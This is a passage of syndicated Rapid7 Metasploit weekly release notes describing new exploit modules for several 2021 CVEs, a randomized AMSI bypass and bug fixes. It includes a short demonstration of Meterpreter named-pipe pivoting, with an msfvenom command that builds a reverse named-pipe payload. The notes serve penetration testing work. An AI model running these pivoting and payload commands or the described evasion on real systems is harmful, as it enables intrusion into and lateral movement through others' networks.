• #16326 from zeroSteiner – This fixes SMB signing detection for the scanner/smb/smb_version module when the target server has SMB1 disabled.
• #16332 from bcoles – This change fixes a bug in APK injection where the native libraries would not automatically be aligned with zipalign, and would fail to install on a device.
• #16334 from bcoles – This change fixes a bug where APK files that were not signed with the v1 scheme would fail during the signing phase of APK file injection with msfvenom.
• #16347 from zeroSteiner – This updates the normalize_host method so that when it attempts and fails to resolve a hostname to an IP address, it will return nil instead of raising an exception. Previously this exception would result in modules like auxiliary/gather/enum_dns crashing instead of saving the information it had managed to gather on the target so far.
• #16350 from sjanusz-r7 – This fixes an unintentional crash when using payload/windows/x64/encrypted_shell_reverse_tcp without having a database configured

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.33…6.1.34
• Full diff 6.1.33…6.1.34

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/11/12/metasploit-wrap-up-138/

Callback Hell

Metasploit has now added an exploit module for CVE-2021-40449, a Windows local privilege escalation exploit caused by a use-after-free during the NtGdiResetDC callback in vulnerable versions of win32k.sys. This module can be used to escalate privileges to those of NT AUTHORITY\SYSTEM. The module should work against Windows 10 x64 build 14393 and 17763, but it should also work against older versions of Windows 10. Note that this exploit may not always work the first time, and may require an additional run to succeed.

OMIGOD it’s LPE

As a continuation to the recently landed OMIGOD RCE module, Spencer McIntyre has contributed a new local privilege escalation module for CVE-2021-38648, which is an authentication bypass within Microsoft’s (OMI) management interface versions less than 1.6.8-1. This vulnerability must be leveraged locally and can be exploited in the default configuration. Exploitation results in OS command execution as the root user.

Named Pipe Pivoting

This week dwelch-r7 fixed a regression issue in Meterpreter’s named pipe pivoting support. This relatively unknown feature was initially added by community contributor OJ and allows users to pivot additional Meterpreter sessions through a compromised host using named pipes over SMB.

As a quick demonstration, users can create a named pipe on a compromised Windows host through an existing Meterpreter session:

sessions -i -1
pivot add -t pipe -l $smb_host_ip -n mypipe -a x64 -p windows

Then verify the pivot was created successfully:

meterpreter > pivot list

Currently active pivot listeners
================================

    Id                                URL                            Stage
    --                                ---                            -----
    c134bb9f27dc4089b2f56b3ad25c4970  pipe://192.168.222.155/mypipe  x64/windows

Now generate a new payload which will connect to the compromised host’s named pivot over SMB:

msfvenom -p windows/x64/meterpreter/reverse_named_pipe PIPEHOST=$smb_host_ip PIPENAME=mypipe -o pipe.exe -f exe -a x64

Execution of this new payload will attempt to connect to the compromised Windows host, resulting in a new session in msfconsole, which can be verified with the sessions command:

New module content (4)

• WordPress Plugin Automatic Config Change to RCE by Jerome Bruandet and h00die – This adds an auxiliary module that leverages an unauthenticated arbitrary WordPress options change vulnerability
  in the Automatic (wp-automatic) plugin version 3.53.2 and below. The module enables user registration, sets the default user role to admin and creates a new privileged user with the provided email address.
• BillQuick Web Suite txtID SQLi by Caleb Stewart and h00die, which exploits CVE-2021-42258 – This adds an auxiliary module that exploits an unauthenticated sql injection vulnerability in BillQuick Web Suite versions before v22.0.9.1.
• Microsoft OMI Management Interface Authentication Bypass by Nir Ohfeld, Shir Tamari, and Spencer McIntyre, which exploits CVE-2021-38648 – This adds a local exploit module that targets versions less than 1.6.8-1 of Microsoft’s Open Management Infrastructure (OMI) software. Issuing a command execution request against the local socket with the authentication handshake omitted can result in code execution as the root user.
• Win32k NtGdiResetDC Use After Free Local Privilege Elevation by Boris Larin, Costin Raiu, Grant Willcox, IronHusky, KaLendsi, Red Raindrop Team of Qi’anxin Threat Intelligence Center, and ly4k, which exploits CVE-2021-40449 – Adds a module for CVE-2021-40449 aka CallbackHell, a Windows local privilege escalation exploit caused by a use after free during the NtGdiResetDC callback in vulnerable versions of win32k.sys.

Enhancements and features

• #15829 from AlanFoster – This makes a couple of improvements to the Kubernetes Exec module to handle slow instances more gracefully by using a configurable exponential back off.
• #15840 from smashery – Changes an error message that was preventing the DCSync operation from running as SYSTEM to a warning to allow it to run. This fixes a case where the computer account has the necessary privileges to complete the operations which is the case when it is a domain controller.
• #15846 from smashery – The download command has been updated so that now supports tab completion for file paths and file names.
• #15859 from smashery – Improves the Meterpreter tab completion functionality on case insensitive filesystems (such as Windows).

Bugs fixed

• #15818 from zeroSteiner – Fixes an edgecase in the Kubernetes exec module which led to sessions dying when performing partial websocket reads

• #15820 from dwelch-r7 – Fixes a regression issue in Meterpreter’s named pipe pivoting support

• #15838 from uhei – Fixes a regression error in auxiliary/scanner/sap/sap_router_portscanner which caused this module to crash when validating host ranges

• #15845 from smashery – This updates Meterpreter to check if it’s running as SYSTEM before attempting to escalate as part of getsystem. This allows it to state that it’s already running as SYSTEM instead of displaying an error message that no escalation technique worked.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.13…6.1.14
• Full diff 6.1.13…6.1.14

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/07/16/metasploit-wrap-up-121/

Eternal Blue improvements

Prior to this release Metasploit offered two separate exploit modules for targeting MS17-010, dubbed Eternal Blue. The Ruby module previously only supported Windows 7, and a separate ms17_010_eternalblue_win8 Python module would target Windows 8 and above.

Now Metasploit provides a single Ruby exploit module exploits/windows/smb/ms17_010_eternalblue.rb which has the capability to target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change removes the need for users to have Python and impacket installed on their host machine, and the automatic targeting functionality will now also make this module easier to run and exploit targets.

AmSi 0BfuSc@t!on

The Anti-Malware Scan Interface integrated into Windows poses a lot of challenges for offensive security testing. While bypasses exist and one such technique is integrated directly into Metasploit, the stub itself is identified as malicious. A chicken and egg problem exists due to the stub being incapable of being executed to bypass AMSI and permit the payload from executing. To address this, Metasploit now randomizes the AMSI bypass stub itself. The randomization both obfuscates literal string values that are known qualifiers for AMSI such as amsiInitFailed as well as shuffles the placement of powershell expressions. With these improvements in place, Powershell payloads are now much more likely to be successfully executed. While the bypass stub is now prepended by default for all exploit modules, it can be explicitly disabled by setting Powershell::prepend_protections_bypass to false.

VMware vCenter Server RCE

Our very own Will Vu has added a new exploit module targeting VMware vCenter Server CVE-2021-21985. This module exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user. See the vendor advisory for affected and patched versions. This module has been tested against VMware vCenter Server 6.7 Update 3m (Linux appliance). For testing in your own lab environment, full details are in the module documentation.

New module content (4)

• VMware vCenter Server Virtual SAN Health Check Plugin RCE by wvu and Ricter Z, which exploits CVE-2021-21985 – A new exploit module for VMware vCenter Server CVE-2021-21985 which exploits Java unsafe reflection and SSRF in the VMware vCenter Server Virtual SAN Health Check plugin’s ProxygenController class to execute code as the vsphere-ui user.
• Polkit D-Bus Authentication Bypass by Kevin Backhouse, Spencer McIntyre, and jheysel-r7, which exploits CVE-2021-3560 – A new module has been added which exploits CVE-2021-3560, an authentication bypass and local privilege elevation vulnerability in polkit, a toolkit for defining and handling authorizations which is installed by default on many Linux systems. Successful exploitation results in the creation of a new user with root permissions, which can then be used to gain a shell as root. Note that exploitation requires that users have a non-interactive session on some systems so users may need to gain a SSH session first before exploiting this vulnerability.
• ForgeRock / OpenAM Jato Java Deserialization by Michael Stepankin, Spencer McIntyre, bwatters-r7, and jheysel-r7, which exploits CVE-2021-35464 – A new module has been added which exploits CVE-2021-35464, a pre-authentication Java deserialization vulnerability
  in OpenAM and ForgeRock AM. Succcessful exploitation allows for remote code execution as the user running the OpenAM service.
• Windows Process Memory Dump by smashery – This adds a new post module that dumps the memory of any process on the target. This module is able to perform a full or a standard dump. It also downloads the file into the local loot database and delete the temporary file on the target.

Enhancements and features

• #15217 from agalway-r7 – Removes the Python module ms17_010_eternalblue_win8.py and consolidates the functionality into exploits/windows/smb/ms17_010_eternalblue.rb – which as a result can now target Windows 7, Windows 8.1, Windows 2012 R2, and Windows 10. This change now removes the need to have Python installed on the host machine, and the automatic targeting functionality will now make this module easier to run.
• #15254 from zeroSteiner – This updates the AMSI bypass used by modules executing Powershell code to be randomized making it more difficult to be detected using static signatures.

Bugs fixed

• #15362 from bwatters-r7 – Fixes a regression issue with post/multi/manage/shell_to_meterpreter, and other interactions with command shell based sessions
• #15420 from adfoster-r7 – Fixes an regression issue were auxiliary/scanner/ssh/eaton_xpert_backdoor failed to load correctly

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.0.52…6.0.53
• Full diff 6.0.52…6.0.53

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).